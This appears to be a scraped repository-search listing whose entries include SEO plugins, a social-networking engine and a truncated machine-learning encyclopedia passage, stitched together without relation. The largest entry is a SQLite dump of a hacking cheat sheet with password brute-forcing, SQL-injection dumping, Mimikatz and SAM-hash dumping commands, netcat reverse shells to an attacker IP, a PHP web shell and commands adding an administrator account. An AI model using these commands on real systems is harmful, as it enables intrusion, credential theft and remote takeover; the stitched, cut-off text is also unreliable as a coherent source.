38 skills found · Page 1 of 2
jekyll / Jekyll Seo TagA Jekyll plugin to add metadata tags for search engines and social networks to better index and display your site's content.
Elgg / ElggA social networking engine in PHP/MySQL
instantsoft / Icms2Self-hosted Site Management System
Don-No7 / Hack SQL-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;
paulmassen / Grav Plugin SeoManage your site’s meta tags for display in search engine results or social media networks. Create and manage json-ld microdata. Includes an easy-to-use live preview feature.
Aryia-Behroziuan / NeuronsAn ANN is a model based on a collection of connected units or nodes called "artificial neurons", which loosely model the neurons in a biological brain. Each connection, like the synapses in a biological brain, can transmit information, a "signal", from one artificial neuron to another. An artificial neuron that receives a signal can process it and then signal additional artificial neurons connected to it. In common ANN implementations, the signal at a connection between artificial neurons is a real number, and the output of each artificial neuron is computed by some non-linear function of the sum of its inputs. The connections between artificial neurons are called "edges". Artificial neurons and edges typically have a weight that adjusts as learning proceeds. The weight increases or decreases the strength of the signal at a connection. Artificial neurons may have a threshold such that the signal is only sent if the aggregate signal crosses that threshold. Typically, artificial neurons are aggregated into layers. Different layers may perform different kinds of transformations on their inputs. Signals travel from the first layer (the input layer) to the last layer (the output layer), possibly after traversing the layers multiple times. The original goal of the ANN approach was to solve problems in the same way that a human brain would. However, over time, attention moved to performing specific tasks, leading to deviations from biology. Artificial neural networks have been used on a variety of tasks, including computer vision, speech recognition, machine translation, social network filtering, playing board and video games and medical diagnosis. Deep learning consists of multiple hidden layers in an artificial neural network. This approach tries to model the way the human brain processes light and sound into vision and hearing. Some successful applications of deep learning are computer vision and speech recognition.[68] Decision trees Main article: Decision tree learning Decision tree learning uses a decision tree as a predictive model to go from observations about an item (represented in the branches) to conclusions about the item's target value (represented in the leaves). It is one of the predictive modeling approaches used in statistics, data mining, and machine learning. Tree models where the target variable can take a discrete set of values are called classification trees; in these tree structures, leaves represent class labels and branches represent conjunctions of features that lead to those class labels. Decision trees where the target variable can take continuous values (typically real numbers) are called regression trees. In decision analysis, a decision tree can be used to visually and explicitly represent decisions and decision making. In data mining, a decision tree describes data, but the resulting classification tree can be an input for decision making. Support vector machines Main article: Support vector machines Support vector machines (SVMs), also known as support vector networks, are a set of related supervised learning methods used for classification and regression. Given a set of training examples, each marked as belonging to one of two categories, an SVM training algorithm builds a model that predicts whether a new example falls into one category or the other.[69] An SVM training algorithm is a non-probabilistic, binary, linear classifier, although methods such as Platt scaling exist to use SVM in a probabilistic classification setting. In addition to performing linear classification, SVMs can efficiently perform a non-linear classification using what is called the kernel trick, implicitly mapping their inputs into high-dimensional feature spaces. Illustration of linear regression on a data set. Regression analysis Main article: Regression analysis Regression analysis encompasses a large variety of statistical methods to estimate the relationship between input variables and their associated features. Its most common form is linear regression, where a single line is drawn to best fit the given data according to a mathematical criterion such as ordinary least squares. The latter is often extended by regularization (mathematics) methods to mitigate overfitting and bias, as in ridge regression. When dealing with non-linear problems, go-to models include polynomial regression (for example, used for trendline fitting in Microsoft Excel[70]), logistic regression (often used in statistical classification) or even kernel regression, which introduces non-linearity by taking advantage of the kernel trick to implicitly map input variables to higher-dimensional space. Bayesian networks Main article: Bayesian network A simple Bayesian network. Rain influences whether the sprinkler is activated, and both rain and the sprinkler influence whether the grass is wet. A Bayesian network, belief network, or directed acyclic graphical model is a probabilistic graphical model that represents a set of random variables and their conditional independence with a directed acyclic graph (DAG). For example, a Bayesian network could represent the probabilistic relationships between diseases and symptoms. Given symptoms, the network can be used to compute the probabilities of the presence of various diseases. Efficient algorithms exist that perform inference and learning. Bayesian networks that model sequences of variables, like speech signals or protein sequences, are called dynamic Bayesian networks. Generalizations of Bayesian networks that can represent and solve decision problems under uncertainty are called influence diagrams. Genetic algorithms Main article: Genetic algorithm A genetic algorithm (GA) is a search algorithm and heuristic technique that mimics the process of natural selection, using methods such as mutation and crossover to generate new genotypes in the hope of finding good solutions to a given problem. In machine learning, genetic algorithms were used in the 1980s and 1990s.[71][72] Conversely, machine learning techniques have been used to improve the performance of genetic and evolutionary algorithms.[73] Training models Usually, machine learning models require a lot of data in order for them to perform well. Usually, when training a machine learning model, one needs to collect a large, representative sample of data from a training set. Data from the training set can be as varied as a corpus of text, a collection of images, and data collected from individual users of a service. Overfitting is something to watch out for when training a machine learning model. Federated learning Main article: Federated learning Federated learning is an adapted form of distributed artificial intelligence to training machine learning models that decentralizes the training process, allowing for users' privacy to be maintained by not needing to send their data to a centralized server. This also increases efficiency by decentralizing the training process to many devices. For example, Gboard uses federated machine learning to train search query prediction models on users' mobile phones without having to send individual searches back to Google.[74] Applications There are many applications for machine learning, including: Agriculture Anatomy Adaptive websites Affective computing Banking Bioinformatics Brain–machine interfaces Cheminformatics Citizen science Computer networks Computer vision Credit-card fraud detection Data quality DNA sequence classification Economics Financial market analysis[75] General game playing Handwriting recognition Information retrieval Insurance Internet fraud detection Linguistics Machine learning control Machine perception Machine translation Marketing Medical diagnosis Natural language processing Natural language understanding Online advertising Optimization Recommender systems Robot locomotion Search engines Sentiment analysis Sequence mining Software engineering Speech recognition Structural health monitoring Syntactic pattern recognition Telecommunication Theorem proving Time series forecasting User 